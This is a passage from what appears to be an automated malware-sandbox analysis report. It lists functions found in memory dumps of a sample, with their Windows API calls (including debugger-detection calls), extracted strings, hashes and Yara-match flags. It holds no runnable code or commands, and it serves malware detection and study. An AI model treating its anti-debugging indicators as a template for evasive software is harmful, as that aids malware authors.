                            • Part of subcall function 6F2505C3: GetLastError.KERNEL32(?,?,6F254F77,?,00000000,?,?,6F254F9C,?,00000007,?,?,6F253037,?,?), ref: 6F2505E4
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Find$CloseFile$ErrorFirstFreeHeapLastNext
                          • String ID:
                          • API String ID: 2537390918-0
                          • Opcode ID: c80fc0ec655f0e8f00e6e101abc79511ed5f46cfe52cad07ed1ef02dde8edb34
                          • Instruction ID: 90998287fd0c2ecdf193d89d5d29042630bbec373c80c8a04c32fa7477ac57da
                          • Opcode Fuzzy Hash: c80fc0ec655f0e8f00e6e101abc79511ed5f46cfe52cad07ed1ef02dde8edb34
                          • Instruction Fuzzy Hash: C04180B190512F9FDF21DB34CC98EEAB774AF0521DF1451D5E009A7191EB329EA48F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24AB0C, Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6F24AB18
                          • IsDebuggerPresent.KERNEL32 ref: 6F24ABE4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F24AC04
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6F24AC0E
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                          • String ID:
                          • API String ID: 254469556-0
                          • Opcode ID: 0b5fcdf69df5ffdd97ab81467103da97f908ccc29625b442891ddb70ad4d7709
                          • Instruction ID: 3195f4dd3e7bbfac1357df6c44320e3e8480dd052079bf560f61e9ea1ed615b5
                          • Opcode Fuzzy Hash: 0b5fcdf69df5ffdd97ab81467103da97f908ccc29625b442891ddb70ad4d7709
                          • Instruction Fuzzy Hash: AA311AB5D4531D9BDF51DF64D989BCCBBB8AF08704F1040AAE40DAB280EBB45A88CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01216453, Relevance: 5.2, Strings: 4, Instructions: 220COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: JS$Q+L$_+M$k%|
                          • API String ID: 0-1651988620
                          • Opcode ID: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction ID: 36561554d049df77825bb4b4e39b61b4fed2ad087ef58720c9982c86ed457aa8
                          • Opcode Fuzzy Hash: ceb267fd2ebd44106289bfd2a23178b3059612b5fc88a7ea45f8895f0ce870ac
                          • Instruction Fuzzy Hash: 5CA120B15183819FC358CF66C48982FFFE2FB94798F10891DF69696260D3B58A49CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01212CC2, Relevance: 5.2, Strings: 4, Instructions: 219COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !y$Zc5$5v$xe
                          • API String ID: 0-3224497632
                          • Opcode ID: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction ID: 8b1aaab25666776cd3e1ad23b34ff1be0fc272e28cf92f2f38ae76a4f7081f9e
                          • Opcode Fuzzy Hash: b09f5cd0d864857308b96e52e71b07b7ab590047c35713b6a52464874615d622
                          • Instruction Fuzzy Hash: 46A11E715083829FC358CF29D48981BFBE1BBD4798F104A2CFA9597220D3B5D949CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01223D0C, Relevance: 5.2, Strings: 4, Instructions: 212COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: FPTh$Z{{$[ob>$e(
                          • API String ID: 0-1695153795
                          • Opcode ID: 881717208be33f69100ed2f91646b6412e379df7cfb6a5027e3884b0d77439e2
                          • Instruction ID: 5d4084ea4597e531c98aab94addc9cae4f109800497b46f4db98972f5d4fac90
                          • Opcode Fuzzy Hash: 881717208be33f69100ed2f91646b6412e379df7cfb6a5027e3884b0d77439e2
                          • Instruction Fuzzy Hash: 3BA135718183929FC358DF69D58981FFBE0BBC4748F004A2DF99997220D7B5CA498F82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121BD61, Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &J$M0}M$t$n
                          • API String ID: 0-2598164408
                          • Opcode ID: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction ID: 203d48f0aa817650a28cdc6efc0b89e92f437afb56e5b849ab7026c91feb30c5
                          • Opcode Fuzzy Hash: 93112c13898719dcb0fa725f487b000004003678a4712dd1a04254958555576a
                          • Instruction Fuzzy Hash: FE9132711083809BD354CE65C549A1BFBF1FBE9758F408A1DF69686220C3B6C948CF82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012143BE, Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ,?Z$,P$x&z$z\
                          • API String ID: 0-1410888773
                          • Opcode ID: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction ID: 9b260760ae7f6a1d1738ee11646f2d5aa910472d24e4133a76d0817b5f25fe1c
                          • Opcode Fuzzy Hash: 17635d5d9c2ea99e6c8d47affebd6329b62548ec35397c7043d11d3fed521b3e
                          • Instruction Fuzzy Hash: 0D718871118382EFD758DF25C48542FBBE2FBE4348F50492DF68A96264D7B1CA498F82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121A083, Relevance: 5.1, Strings: 4, Instructions: 149COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 8i$UZ$aK$wN
                          • API String ID: 0-333574292
                          • Opcode ID: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction ID: ea20b7ce565a21dea0d67976c50f068df3e170d081e4d5ee71c40a36a8e56b59
                          • Opcode Fuzzy Hash: a6a0b24c383be7939de8cb5fa0a7f320f0c154413070ca55bcd0e1767f045125
                          • Instruction Fuzzy Hash: 3251C8311193829FD348CF29D48945FBBE1FBD8718F504A1EF69693260D3B5CA0A8B83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122E3B5, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: Ev$uj$w0$!
                          • API String ID: 0-1708426219
                          • Opcode ID: 834f81bc9e7adf6db358f3a441ca619e0161ee7d650dc18d9b175e20565acec5
                          • Instruction ID: ac355909411434693b49760ea2e2058b604cdd46df07c68a2e73eae65de962cf
                          • Opcode Fuzzy Hash: 834f81bc9e7adf6db358f3a441ca619e0161ee7d650dc18d9b175e20565acec5
                          • Instruction Fuzzy Hash: AE5131B1D0021AABDF48DFE5D80A8EEFBB2FF58304F208059D911B6260E7B55A55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122DB87, Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !_$N6\$R|h7$W+(
                          • API String ID: 0-592429890
                          • Opcode ID: 0857a837d88a9b579423efe058ba63e55919d3b518bf3405e66e747605a67a13
                          • Instruction ID: 846c032a81cb20685c7090f5856bddfb00b936409abc1c5ef387111d4d65a55f
                          • Opcode Fuzzy Hash: 0857a837d88a9b579423efe058ba63e55919d3b518bf3405e66e747605a67a13
                          • Instruction Fuzzy Hash: 8D511E71D0121DEBDF08DFA1D88A8EEBFB2FB48304F208059E411BA264D7B55A55CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250326, Relevance: 4.6, APIs: 3, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6F25041E
                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6F250428
                          • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6F250435
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 874d8f823abd1ffc5776119551699cde0c9659af9f7514c420e951f7d6d27a0d
                          • Instruction ID: 662a2a696a4c34fe135068d088a17df873d17678989dd42754dbe5a62eb77f4e
                          • Opcode Fuzzy Hash: 874d8f823abd1ffc5776119551699cde0c9659af9f7514c420e951f7d6d27a0d
                          • Instruction Fuzzy Hash: 6D31B37590122DABCB21DF24D988BCCBBB8AF08714F5055EAE41CA7290EB749F958F44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F239F10, Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                          Download Yara Rule
                          Strings
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F239F76
                          • {recursion limit reached}{invalid syntax}, xrefs: 6F23A182
                          • <>()C,, xrefs: 6F239FAD
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: <>()C,$?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${recursion limit reached}{invalid syntax}
                          • API String ID: 0-2241449410
                          • Opcode ID: 24111eb3a80b48ab285ebfe3d89ae9ceafa82d2d24cb259067e5487e8d8b5d6b
                          • Instruction ID: a1c776b1bbc1cb67d4377a7d3d382f66b727f6df6531d1a98bb8e614727719b5
                          • Opcode Fuzzy Hash: 24111eb3a80b48ab285ebfe3d89ae9ceafa82d2d24cb259067e5487e8d8b5d6b
                          • Instruction Fuzzy Hash: AC81D2F6F0872A4FEB24CE28C480796B7E69F86311F04853ED4DA8B695DB35E4468F11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121F0E9, Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #,BW$Iv5$TaF_
                          • API String ID: 0-3731106609
                          • Opcode ID: c80b19bc725e95316d59f179ca1992d04e91b163fac7d9fc1a06b978a86df4f0
                          • Instruction ID: d1314735fc99ebcf6f6e7b996cc78943d0950a4b7e6f624b32fd846201f9fd33
                          • Opcode Fuzzy Hash: c80b19bc725e95316d59f179ca1992d04e91b163fac7d9fc1a06b978a86df4f0
                          • Instruction Fuzzy Hash: 28A19872D1021DEBCF29CFA4C9459EEBBB2FF54314F208159E216BA264D7700A89CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012285B8, Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: uQY$uQY$|&P-
                          • API String ID: 0-2022688025
                          • Opcode ID: dc1715fa9e5b7c4c17e9996c3202d084db42ee896ddc37e6ed949b93ef5e7a7e
                          • Instruction ID: ed39fb6000c2fc3ee390a80dc192664c6da33932ef4664a3fdae61446f9ec61b
                          • Opcode Fuzzy Hash: dc1715fa9e5b7c4c17e9996c3202d084db42ee896ddc37e6ed949b93ef5e7a7e
                          • Instruction Fuzzy Hash: 4DA12172908341AFD358CF29D48941BFBE2FBC5754F008A1DF595AA260D7B1D94A8F83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01229124, Relevance: 4.0, Strings: 3, Instructions: 200COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: H9${FQ$~\
                          • API String ID: 0-4294077001
                          • Opcode ID: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction ID: 94df1a97bb4f382b51d9431486470e0240d98f596ed9bafc05764b9f61b4a46c
                          • Opcode Fuzzy Hash: 6dc99ee14886c765de8187c205a84e16219ca8db519214540246810d04901235
                          • Instruction Fuzzy Hash: 56B1ED7240038CEBDF59DFA1D94A8CE3BB1FB44388F508119FD2A96260C7B59999CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121CB13, Relevance: 3.9, Strings: 3, Instructions: 181COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: CP$F~c$|t3
                          • API String ID: 0-82454184
                          • Opcode ID: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction ID: 328644941d3507cf9bb070db14ded8ebe3f61af1fc2b477c84b0f5553ed46d80
                          • Opcode Fuzzy Hash: b04b25bbecc1f259a4fc2fde3581c27bdc2d4569c3b966c7e3772340f07d2b4f
                          • Instruction Fuzzy Hash: EB815271D1020AEBCF58CFA9D98A4EEFFB5FF18314F208159D512B6260D3B44A558F94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01220BA4, Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: (B$S&$~
                          • API String ID: 0-116492414
                          • Opcode ID: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction ID: b7848e6760c81b07f3ab3a1803adc0eb60bcf2a1132072ca9240c0ce57776ccf
                          • Opcode Fuzzy Hash: 26746bb7a51525a6e6b45d6698d9aacd379f953159f35882a3bd0a96d12f38f3
                          • Instruction Fuzzy Hash: FC7130B1419341AFD358CF65C98942FBBF1FB95B58F104A0CF69696220D3B1CA498F87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122BF0C, Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *1W$+[$m&E>
                          • API String ID: 0-1836634314
                          • Opcode ID: 964ca2234fc8f68622cb4adf1edccc424a415e0e1788548d205afef249b21edf
                          • Instruction ID: 9420b5f8c69f9742e4c92a33656c0f91ec5d6eefd0aff73ab6b37250adf59cef
                          • Opcode Fuzzy Hash: 964ca2234fc8f68622cb4adf1edccc424a415e0e1788548d205afef249b21edf
                          • Instruction Fuzzy Hash: 05714F7111C3819BC758CF60E98A91FBBF1FBC4758F104E1DF68296260D7B99A19CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 012190D4, Relevance: 3.9, Strings: 3, Instructions: 128COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 13>$?_A$Jk|
                          • API String ID: 0-3522153091
                          • Opcode ID: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction ID: e5e0ac8c10f6e60376371d5c0dcaa09080ace840f09451304fba842edc0319a3
                          • Opcode Fuzzy Hash: 9f7db7fd69f16722ed54bbb1faa115af283d7ab3a07288f3dd77a07395533225
                          • Instruction Fuzzy Hash: A9511471C0121AABDF18CFA5D9469EEFBB1FB48318F208199D511BA260D3B85A45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122E10A, Relevance: 3.9, Strings: 3, Instructions: 112COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: D^$vq$%
                          • API String ID: 0-2873858206
                          • Opcode ID: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction ID: 3b0ee2fd52649e98b5bf962e993851f1c73020213184dab4d61585e274b90dbe
                          • Opcode Fuzzy Hash: 54c4ce59a686b5dd3bf9a7e3ef94cf9caef809456948d77d4bf3fce0830084f2
                          • Instruction Fuzzy Hash: CD41747110C312AFC718DE25C58942FBBE5FBC9758F100A1DF68AA6260C7B1CA488F97
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121F48A, Relevance: 3.9, Strings: 3, Instructions: 105COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )o$HzL$hsn
                          • API String ID: 0-543950899
                          • Opcode ID: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction ID: f567253a144a45ce676781d3fa5a75aea39321ed381fa0f5d4bcea05849c1bb5
                          • Opcode Fuzzy Hash: 143d3884d5ae298a24ff13d8d7f865c4b77dc7df5fcf487677fbae11b3d6bed3
                          • Instruction Fuzzy Hash: 33418A715183829FC718CE25D54642FFBE1EBD4348F140E2DF6A656264D3B5CA4C8B87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122E899, Relevance: 3.8, Strings: 3, Instructions: 88COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )$H`f$^s\A
                          • API String ID: 0-2557149085
                          • Opcode ID: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction ID: f3d86db76cc508d5ff8b62c07f779e620dc8b565bb39bfd3c5c92656a3365a30
                          • Opcode Fuzzy Hash: b10851f5ff62cb8970c47835fd07839b934c7fb626b2a7cf67d0b20d897d4c34
                          • Instruction Fuzzy Hash: EF3166726083059FC358CF2AC88144BBBE5FBD8718F048A2DFA8993254D770DA0ACF46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121CE5A, Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 0mZ$5-\$t2
                          • API String ID: 0-2873251415
                          • Opcode ID: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction ID: d26aea76c3bedd0001ec6793c39e9874a141fe4e95d8b1ef819b1d9be561c95c
                          • Opcode Fuzzy Hash: 37070c9cf26442f8ea0e86b1f7c3f5d7b53a1400e48d463895da02277b411f90
                          • Instruction Fuzzy Hash: 7A3112B190130AEBDF44CFA5DA0A89FBBB5FF54314F108549E92562260D3B09B24DFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122DDA5, Relevance: 3.8, Strings: 3, Instructions: 58COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A>#$mK]$zh
                          • API String ID: 0-608348618
                          • Opcode ID: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction ID: 5a54fb90ac4bea1ddbc802c04f0bd635c27c79a499cc36b9953a67adcf6c9858
                          • Opcode Fuzzy Hash: 103dee2b336bf25f8507ba83b0e833d55c82a63d957243bf54ec1509db9afec3
                          • Instruction Fuzzy Hash: 5421F2B6E0020EEBDF04DFA5C84A5AEBBB1FB50318F208599D514BA250D7B41B18DF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F240380, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 732COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID: <unknown>
                          • API String ID: 1617791916-1574992787
                          • Opcode ID: db0037f023b60e53ebe302adbe0321ab9d0ec9ae4e507a52923a00d329f9f40e
                          • Instruction ID: 46b13a685de446747e94d26bbb7ba50043383c16ec811351862fec57cfc31a87
                          • Opcode Fuzzy Hash: db0037f023b60e53ebe302adbe0321ab9d0ec9ae4e507a52923a00d329f9f40e
                          • Instruction Fuzzy Hash: E662DC71E0426D8FDB19CFA8C8907DDBBB2AF69304F1451AAD859BB242D7B069C1CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F231DE0, Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: ?${invalid syntax}
                          • API String ID: 0-3691751180
                          • Opcode ID: 5fe3f3bbaa364746b8d06bb137bbb636ddf917773968e8c5c80019ff59ec77cf
                          • Instruction ID: ab11490049a197998b90502dfd1344ec7c6b5fac7b8f16357510e4504036722d
                          • Opcode Fuzzy Hash: 5fe3f3bbaa364746b8d06bb137bbb636ddf917773968e8c5c80019ff59ec77cf
                          • Instruction Fuzzy Hash: 5AB119F3E1833A8FC7158E28C580559B7A2EF96355F04871EE8E55B252D732E982CF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01211EFB, Relevance: 2.8, Strings: 2, Instructions: 260COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: L&^$wg
                          • API String ID: 0-3816254650
                          • Opcode ID: 17007f9362b5b24a099b3fa56c2c3ec35597ab082f4267d53f71c11cc53598d6
                          • Instruction ID: 0fe98d9f34e7f614043b96791d1e5a18341dbc507170ac2a02317b71223dda59
                          • Opcode Fuzzy Hash: 17007f9362b5b24a099b3fa56c2c3ec35597ab082f4267d53f71c11cc53598d6
                          • Instruction Fuzzy Hash: 4AD11E715083809FD368CF61C489A5FFBE2FBD5358F208A1DF1AA96260D7B58949CF42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F2368B0, Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                          Download Yara Rule
                          Strings
                          • {invalid syntax}, xrefs: 6F236B4D
                          • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6F2368C9
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "${invalid syntax}
                          • API String ID: 0-903684146
                          • Opcode ID: 5c6a8fcf561556b7cee2bfb6b725c6a69bec3791b0de528f8b2ccf31c79f3ee9
                          • Instruction ID: ecfff8dee26b0612e44bd17b8bcb6260f7cc729655def5579d9f017cb274fa08
                          • Opcode Fuzzy Hash: 5c6a8fcf561556b7cee2bfb6b725c6a69bec3791b0de528f8b2ccf31c79f3ee9
                          • Instruction Fuzzy Hash: 488137F3F0432E4FE7214E6495E0F66BBEAAF43715F00852DC89A4B685D631B4468F52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01223782, Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &b$*0
                          • API String ID: 0-1870266505
                          • Opcode ID: 50880284d0e9342d5679a526af0ddf43d637c4afaa052373fab50bf6f113c256
                          • Instruction ID: 699f3619ed6cace4864e4f7be296504f7ed9ca8559df22a2d9ca89189dc48364
                          • Opcode Fuzzy Hash: 50880284d0e9342d5679a526af0ddf43d637c4afaa052373fab50bf6f113c256
                          • Instruction Fuzzy Hash: 46B14172818381AFC3A8CE69C58951FFBE1BBC4758F50891DF2D596260D3B98958CF83
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 01231CDB, Relevance: 2.7, Strings: 2, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
